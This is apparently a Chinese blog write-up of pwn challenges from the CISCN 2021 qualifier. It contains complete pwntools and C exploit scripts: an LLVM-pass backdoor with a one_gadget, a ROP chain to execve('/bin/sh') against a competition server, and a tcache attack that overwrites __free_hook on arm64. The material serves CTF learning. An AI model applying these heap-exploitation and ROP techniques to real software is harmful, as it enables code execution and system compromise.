CISCN2021 QUAL pwn

昨天打了国赛,记录下pwn题

SATools

大晚上放题,还叫冲刺题,还让人好好睡觉了不

题目是一个llvm的pass,经过分析后是FunctionPass,sub19D0是主要处理函数

大部分都是调试和猜测得知:

  • save原型应该是save(const char* s1,const char* s2),返回值和函数体里是怎么样无所谓,因为没有对函数体的东西进行操作
  • takeaway的原型是takeaway(const char* s)
  • run的原型是run(void)
  • stealkey的原型是stealkey(void)
  • fakekey的原型是fakekey(int offset)

反编译里显示的:

1
2
3
v19 = llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - 24));
v20 = v8 - 24LL * (*(_DWORD *)(v8 + 20) & 0xFFFFFFF);
if ( 0xAAAAAAAB * (unsigned int)((v15 + 24 * v18 - 24 * (unsigned __int64)v19 - v20) >> 3) == 2 )

应该是在检查函数参数的个数,比如这里应该是检查函数的参数是不是两个

pass在处理他们的时候会对bss段上的一个结构体进行操作:

1
2
3
4
5
6
.bss:00000000002040F8 ; _QWORD *byte_2040f8
.bss:00000000002040F8 _byte_2040f8    dq ?                    ; DATA XREF: LOAD:0000000000000748↑o
.bss:00000000002040F8                                         ; .got:_byte_2040f8_ptr↑o
.bss:0000000000204100                 public _byte_204100
.bss:0000000000204100 _byte_204100    dq ?                    ; DATA XREF: LOAD:00000000000006B8↑o
.bss:0000000000204100                                         ; .got:_byte_204100_ptr↑o

save:

  • save会把参数1和参数2复制到一个0x18大小的堆中,这里好像可以堆溢出的,但是后面利用的时候并没用用到

takeaway:

  • byte_2040f8 = (_QWORD *)byte_2040f8[2];,大概就是这个效果,前面还有一堆的判断

stealkey:

  • byte_204100 = *byte_2040f8;

fakekey:

  • orig = byte_204100
  • byte_204100 = orig + offset;
  • *byte_2040f8 = orig + offset;

run:

  • call *byte_2040f8

综合上面调试发现,最终的利用思路是:

  • 先调用好几个save,使得堆用unsorted bin来进行分配,这样就会残留libc地址,这也是为什么参数s1和s2都不填东西,这样就只会复制一个’\x00’上去
  • 接着用stealkey把残留的libc地址放到byte_204100上
  • 再用fakekey把one_gadget和残留的libc地址的偏移加上
  • 最后调用run即可

exp.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int save(const char* s1,const char* s2){

    return 2;
}

int takeaway(const char* s){

    return 3;
}

int run(void){
    return 1;
}

int stealkey(void){
    return 2;
}

int fakekey(int offset){
    return 4;
}

int B4ckDo0r(int a1){
    int s = save("","");
    s = save("","");
    s = save("","");
    s = save("","");
    s = save("","");
    s = save("","");
    int a = stealkey();
    int b = fakekey(-0x39c86e);
    int c = run();
    return 0;
}

用clang编译下:clang -emit-llvm -c exp.c -o exp.bc

pwny

读和写的位置都是我们可以控制的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned __int64 write_()
{
  __int64 v0; // rbp
  __int64 v2; // [rsp+0h] [rbp-28h]
  unsigned __int64 v3; // [rsp+8h] [rbp-20h]

  v3 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &v2);
  v0 = v2;
  v2 = 0LL;
  read((unsigned __int8)rand_fd, &v2, 8uLL);
  buffer[v0] = v2;
  return __readfsqword(0x28u) ^ v3;
}

两次write,idx都选256,覆盖掉fd,这样后面读都是从输入流读了

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *
context.arch = 'amd64'
context.log_level ='debug'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))


def write(idx):
    p.recvuntil("Your choice:")
    p.sendline("2")
    p.sendlineafter("Index: ",str(idx))

def read(idx):
    p.recvuntil("Your choice:")
    p.sendline("1")
    p.sendlineafter("Index: ",p64(idx))


def main(host, port = 23354):
    global p
    if host:
        p = remote(host, port)
    else:
        p = process("./pwny",env={"LD_PRELOAD":"./libc-2.27.so"})
    
    write(256)
    write(256)
    read(0xffffffffffffffd0/8)
    p.recvuntil("Result: ")
    libc_base = int(p.recvuntil("\n"),16) - 0x3eba00
    success("libc_base: "+hex(libc_base))
    read(0xffffffffffffffa8/8)
    p.recvuntil("Result: ")
    buffer_base = int(p.recvuntil("\n"),16)-8+0x60
    success("buffer_base: "+hex(buffer_base))
    env_ = 0x3ee098+libc_base
    read((env_-buffer_base)/8)
    p.recvuntil("Result: ")
    stack = int(p.recvuntil("\n"),16) - 0x120 - 8
    success("stack: "+hex(stack))
    
    pop_rdi = 0x00000000000215bf + libc_base
    pop_rdx_rsi = 0x0000000000130569 + libc_base
    execve = 0xe4c00 + libc_base
    rop_chain = [
        pop_rdi,buffer_base+0x80,pop_rdx_rsi,0,0,execve
    ]
    
    write(0x10)
    p.send("/bin/sh\x00")
    idx = 1
    for i in rop_chain:
        write(idx)
        p.send(p64(i))
        idx += 1
    # debug(0xC1e)
    write((stack-buffer_base)/8)
    p.send(p64(buffer_base))
    leave_ret = 0x0000000000054913 + libc_base
    write((stack-buffer_base+8)/8)
    p.send(p64(leave_ret))
    p.interactive()

if __name__ == "__main__":
    # main(0)
    main("124.71.225.249")

lonelywolf

只有一个堆块,但是free没有清空指针,可以UAF,利用UAF修改掉以释放的堆块的key就能double free了,用scanf来触发malloc_consolidate来取得unsorted bin

silverwolf

好像流程和lonelywolf一样,但是只能orw,所以改free_hook为setcontext+53来进行rop

game

只允许open,read,write,mprotect

命令格式:

s应该是size

add_chunk:

1
2
3
4
op:1\n
l:4\n
w:4\n
\n

add_desc:

1
2
3
4
op:2\n
id:1\n
s:32\n
\n

dele_desc:

1
2
3
op:3\n
id:1\n
\n

show_desc:

1
2
op:4\n
\n

5,6,7,8都是写入操作,能越界写

channel

arm64的架构,libc也是2.31所以能用tcache,其实就是arm64下的堆题

运行:

1
2
3
4
mkdir lib
mv ld-2.31.so ./lib/ld-linux-aarch64.so.1
mv libc-2.31.so ./lib/libc.so.6
./qemu-aarch64-static -L ./ ./channel

漏洞点:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
void *unregister()
{
  char v1; // [xsp+1Fh] [xbp+1Fh]
  chunk *i; // [xsp+20h] [xbp+20h]
  chunk *ptr; // [xsp+30h] [xbp+30h]
  char s[256]; // [xsp+38h] [xbp+38h] BYREF

  puts("key> ");
  memset(s, 0, sizeof(s));
  read(0, s, 0x100uLL);
  if ( register_count )
  {
    if ( register_count == 1 )
    {
      if ( (unsigned __int8)strcmp_(s, chunk_head->key) )
      {
        free(chunk_head);
        chunk_head = 0LL;
        --register_count;
      }
    }
    else if ( !(unsigned __int8)strcmp_(chunk_head->key, s) )// register count大于等于2的时候
    {
      v1 = 0;
      for ( i = chunk_head; i->next; i = (chunk *)i->next )
      {
        if ( (unsigned __int8)strcmp_(s, (char *)i->next) )
        {
          v1 = 1;
          break;
        }
      }
      if ( v1 )
        free((void *)i->next);                  // 这里只是free了chunk,但是没有更新head
    }
    else
    {
      ptr = chunk_head;
      chunk_head = (chunk *)chunk_head->next;
      free(ptr);
    }
  }
  return &_stack_chk_guard;
}

根据漏洞点,我们可以伪造一个chunk,在伪造chunk里的content来进行任意地址泄露,根据泄露的远程的堆地址,可以知道远程的环境使用qemu-user启动的,故地址都不会变化

泄露了之后,在利用write功能里的赋值来对tcache结构进行攻击,伪造tcache链,最后getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
void *write_()
{
  content *v0; // x0
  int size; // [xsp+14h] [xbp+14h]
  chunk *chunk; // [xsp+18h] [xbp+18h]
  void *content; // [xsp+20h] [xbp+20h]
  char buf[8]; // [xsp+30h] [xbp+30h] BYREF
  char s[256]; // [xsp+38h] [xbp+38h] BYREF

  puts("key> ");
  memset(s, 0, sizeof(s));
  read(0, s, 0x100uLL);
  memset(buf, 0, sizeof(buf));
  for ( chunk = chunk_head; chunk; chunk = (chunk *)chunk->next )
  {
    if ( (unsigned __int8)strcmp_(chunk->key, s) )
    {
      puts("len> ");
      read(0, buf, 8uLL);
      size = atoi(buf);
      if ( size <= 0 || size > 0x200 )
      {
        puts("abort.");
        exit(1);
      }
      content = malloc(size);
      if ( !content )
      {
        puts("abort.");
        exit(1);
      }
      puts("content> ");
      read(0, content, (unsigned int)size);
      v0 = (content *)malloc(0x10uLL);
      v0->ptr = (__int64)content;
      v0->next = (content *)chunk->content_list;
      chunk->content_list = v0;        // 我们可以伪造chunk。故这里的效果相当于把v0写入一个任意地址
      return &_stack_chk_guard;
    }
  }
  return &_stack_chk_guard;
}

最终exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *

# context.arch = 'amd64'

def menu(idx):
    p.sendlineafter("> ",str(idx))
        
def add(key):
    menu(1)
    p.sendafter("key> ",key)
    
def dele(key):
    menu(2)
    p.sendafter("key> ",key)

def show(key):
    menu(3)
    p.sendafter("key> ",key)

def edit(key,len_,content):
    menu(4)
    p.sendafter("key> ",key)
    p.sendafter("len> ",str(len_))
    p.sendafter("content> ",content)
    
def main(host,port=23221):
    global p
    if host:
        p = remote(host,port)
    else:
        # p = process("./qemu-aarch64-static -L ./ -g 1234 ./channel".split())
        p = process("./qemu-aarch64-static -L ./ ./channel".split())
    add("chunk3")
    add("chunk2")
    add("chunk1")
    dele("chunk1")
    dele("chunk2")
    edit("chunk3",0x110,"A")
    show("chunk3")
    base = 0x4000000000
    p.recvuntil("\n")
    heap = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x41 + base
    info("heap : " + hex(heap))
    add("chunk4")
    dele("chunk3")
    fake_chunk = "\x00"*8+p64((heap&0xfffffffffffff000)+0x10)
    read_got = 0x11F78
    fake_chunk += p64(base+read_got)
    # fake_chunk = fake_chunk.ljust(0x100,"\x00")+p64(0)+p64(heap-0x150+0x10) # local
    fake_chunk = fake_chunk.ljust(0x100,"\x00")+p64(0)+p64(heap-0x160+0x10) # remote
    edit("chunk4",0x110,fake_chunk)
    show(fake_chunk[:0x100])
    p.recvuntil("\n")
    read_addr = u64(p.recvuntil("\n")[:-1].ljust(8,"\x00")) + base
    info("read_addr : " + hex(read_addr))
    
    libc.address = read_addr - libc.sym["read"]
    
    for i in range(5):
        add(str(i))
    for i in range(5):
        dele(str(4-i))
    
    dele(fake_chunk[:0x100])
    fake_chunk = "\x00"*0x100
    fake_chunk += p64((heap&0xfffffffffffff000)+0x8)
    edit("chunk4",0x110,fake_chunk)
    
    key = p64(0x0000000000000291)
    key += p64(0)*4
    key += p64(0x0000000000000005)
    key += p64(0)*10
    # key += p64(0x0001000000000000)    # local
    key += p64(0)       # remote
    key += p64(0)*15
    
    fake_chunk = p64(libc.sym["__free_hook"])
    info("__free_hook : " + hex(libc.sym["__free_hook"]))
    edit(key,0x1e0,fake_chunk)
    
    edit("chunk4",0x110,p64(0)*3+p64(0x00000000000fedf1))
    add("/bin/sh\x00")
    edit("chunk4",0x110,p64(libc.sym["system"]))
    dele("/bin/sh\x00")
    p.interactive()

if __name__ == "__main__":
    libc = ELF("./lib/libc.so.6",checksec=False)
    main(args['REMOTE'])

要注意的就是本地调试的时候,好像是stdin在堆上分配了一个0x410大小的chunk,故本地泄露的地址和远程泄露的有点不一样,最后比对key的时候也要注意这里

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

beginner